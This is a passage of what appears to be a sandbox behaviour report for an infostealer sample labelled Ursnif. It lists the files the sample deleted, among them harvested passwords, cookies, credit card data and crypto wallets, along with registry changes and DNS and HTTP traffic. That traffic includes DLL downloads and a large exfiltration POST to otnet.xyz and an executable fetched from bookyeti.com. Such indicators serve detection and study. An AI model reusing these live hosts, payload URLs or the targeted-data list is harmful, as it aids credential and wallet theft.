  668.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC713.tmp.mdmp",
  669.     "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERBC62.tmp.appcompat.txt",
  670.     "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERBFBE.tmp.WERInternalMetadata.xml",
  671.     "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERBFDE.tmp.hdmp",
  672.     "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERC713.tmp.mdmp",
  673.     "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\Report.wer",
  674.     "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  675.     "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\Report.wer.tmp"
  676.  
  677.  
  678. * Deleted Files:
  679.     "C:\\ProgramData\\freebl3.dll",
  680.     "C:\\ProgramData\\mozglue.dll",
  681.     "C:\\ProgramData\\msvcp140.dll",
  682.     "C:\\ProgramData\\nss3.dll",
  683.     "C:\\ProgramData\\softokn3.dll",
  684.     "C:\\ProgramData\\vcruntime140.dll",
  685.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Autofill\\Google Chrome_Default.txt",
  686.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Autofill",
  687.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\CC\\Google Chrome_Default.txt",
  688.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\CC",
  689.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Edge_Cookies.txt",
  690.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Google Chrome_Default.txt",
  691.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\IE_Cookies.txt",
  692.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies",
  693.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\cookie_list.txt",
  694.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Downloads\\Google Chrome_Default.txt",
  695.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Downloads",
  696.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Files\\Default.zip",
  697.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Files",
  698.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\History\\Google Chrome_Default.txt",
  699.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\History",
  700.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\information.txt",
  701.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\outlook.txt",
  702.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\passwords.txt",
  703.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\screenshot.jpg",
  704.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Soft\\Authy",
  705.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Soft",
  706.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin",
  707.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin",
  708.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin",
  709.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DashCore",
  710.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin",
  711.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin",
  712.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectronCash",
  713.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum",
  714.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectrumLTC",
  715.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Ethereum",
  716.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Exodus",
  717.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin",
  718.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko",
  719.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin",
  720.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\GoldCoinGLD",
  721.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin",
  722.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IOCoin",
  723.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin",
  724.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\JAXX",
  725.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin",
  726.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin",
  727.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin",
  728.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MultiDoge",
  729.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin",
  730.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin",
  731.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin",
  732.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin",
  733.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Zcash",
  734.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets",
  735.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\CA_00000000-0000-0000-0000-0000000000009437374709.zip",
  736.     "C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_6cc70fb7b014fe253989338d5008381d.exe",
  737.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBC62.tmp",
  738.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBC62.tmp.appcompat.txt",
  739.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFBE.tmp",
  740.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFBE.tmp.WERInternalMetadata.xml",
  741.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFDE.tmp",
  742.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFDE.tmp.hdmp",
  743.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC713.tmp",
  744.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC713.tmp.mdmp",
  745.     "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\Report.wer.tmp"
  746.  
  747.  
  748. * Modified Registry Keys:
  749.     "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
  750.     "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
  751.     "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  752.     "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
  753.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
  754.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
  755.  
  756.  
  757. * Deleted Registry Keys:
  758.  
  759. * DNS Communications:
  760.    
  761.         "type": "A",
  762.         "request": "otnet.xyz",
  763.         "answers":
  764.            
  765.                 "data": "209.141.47.33",
  766.                 "type": "A"
  767.            
  768.        
  769.    
  770.    
  771.         "type": "A",
  772.         "request": "ip-api.com",
  773.         "answers":
  774.            
  775.                 "data": "72.11.140.50",
  776.                 "type": "A"
  777.            
  778.            
  779.                 "data": "66.212.29.250",
  780.                 "type": "A"
  781.            
  782.        
  783.    
  784.    
  785.         "type": "A",
  786.         "request": "bookyeti.com",
  787.         "answers":
  788.            
  789.                 "data": "199.204.213.10",
  790.                 "type": "A"
  791.            
  792.        
  793.    
  794.  
  795.  
  796. * Domains:
  797.    
  798.         "ip": "209.141.47.33",
  799.         "domain": "otnet.xyz"
  800.    
  801.    
  802.         "ip": "72.11.140.50",
  803.         "domain": "ip-api.com"
  804.    
  805.    
  806.         "ip": "199.204.213.10",
  807.         "domain": "bookyeti.com"
  808.    
  809.  
  810.  
  811. * Network Communication - ICMP:
  812.  
  813. * Network Communication - HTTP:
  814.    
  815.         "count": 1,
  816.         "body": "--1BEF0A57BE110FD467A--\r\n",
  817.         "uri": "http://otnet.xyz/141",
  818.         "user-agent": "",
  819.         "method": "POST",
  820.         "host": "otnet.xyz",
  821.         "version": "1.1",
  822.         "path": "/141",
  823.         "data": "POST /141 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  824.         "port": 80
  825.    
  826.    
  827.         "count": 1,
  828.         "body": "",
  829.         "uri": "http://otnet.xyz/freebl3.dll",
  830.         "user-agent": "",
  831.         "method": "GET",
  832.         "host": "otnet.xyz",
  833.         "version": "1.1",
  834.         "path": "/freebl3.dll",
  835.         "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\n\r\n",
  836.         "port": 80
  837.    
  838.    
  839.         "count": 1,
  840.         "body": "",
  841.         "uri": "http://otnet.xyz/freebl3.dll?ddosprotected=1",
  842.         "user-agent": "",
  843.         "method": "GET",
  844.         "host": "otnet.xyz",
  845.         "version": "1.1",
  846.         "path": "/freebl3.dll?ddosprotected=1",
  847.         "data": "GET /freebl3.dll?ddosprotected=1 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  848.         "port": 80
  849.    
  850.    
  851.         "count": 1,
  852.         "body": "",
  853.         "uri": "http://otnet.xyz/mozglue.dll",
  854.         "user-agent": "",
  855.         "method": "GET",
  856.         "host": "otnet.xyz",
  857.         "version": "1.1",
  858.         "path": "/mozglue.dll",
  859.         "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  860.         "port": 80
  861.    
  862.    
  863.         "count": 1,
  864.         "body": "",
  865.         "uri": "http://otnet.xyz/msvcp140.dll",
  866.         "user-agent": "",
  867.         "method": "GET",
  868.         "host": "otnet.xyz",
  869.         "version": "1.1",
  870.         "path": "/msvcp140.dll",
  871.         "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  872.         "port": 80
  873.    
  874.    
  875.         "count": 1,
  876.         "body": "",
  877.         "uri": "http://otnet.xyz/nss3.dll",
  878.         "user-agent": "",
  879.         "method": "GET",
  880.         "host": "otnet.xyz",
  881.         "version": "1.1",
  882.         "path": "/nss3.dll",
  883.         "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  884.         "port": 80
  885.    
  886.    
  887.         "count": 1,
  888.         "body": "",
  889.         "uri": "http://otnet.xyz/softokn3.dll",
  890.         "user-agent": "",
  891.         "method": "GET",
  892.         "host": "otnet.xyz",
  893.         "version": "1.1",
  894.         "path": "/softokn3.dll",
  895.         "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  896.         "port": 80
  897.    
  898.    
  899.         "count": 2,
  900.         "body": "",
  901.         "uri": "http://otnet.xyz/vcruntime140.dll",
  902.         "user-agent": "",
  903.         "method": "GET",
  904.         "host": "otnet.xyz",
  905.         "version": "1.1",
  906.         "path": "/vcruntime140.dll",
  907.         "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  908.         "port": 80
  909.    
  910.    
  911.         "count": 1,
  912.         "body": "--1BEF0A57BE110FD467A--\r\n",
  913.         "uri": "http://ip-api.com/line/",
  914.         "user-agent": "",
  915.         "method": "POST",
  916.         "host": "ip-api.com",
  917.         "version": "1.1",
  918.         "path": "/line/",
  919.         "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  920.         "port": 80
  921.    
  922.    
  923.         "count": 1,
  924.         "body": "",
  925.         "uri": "http://otnet.xyz/",
  926.         "user-agent": "",
  927.         "method": "POST",
  928.         "host": "otnet.xyz",
  929.         "version": "1.1",
  930.         "path": "/",
  931.         "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40781\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  932.         "port": 80
  933.    
  934.    
  935.         "count": 1,
  936.         "body": "",
  937.         "uri": "http://bookyeti.com/img/3001.exe",
  938.         "user-agent": "",
  939.         "method": "GET",
  940.         "host": "bookyeti.com",
  941.         "version": "1.1",
  942.         "path": "/img/3001.exe",
  943.         "data": "GET /img/3001.exe HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: bookyeti.com\r\nConnection: Keep-Alive\r\n\r\n",
  944.         "port": 80
  945.    
  946.  
  947.  
  948. * Network Communication - SMTP:
  949.  
  950. * Network Communication - Hosts:
  951.  
  952. * Network Communication - IRC: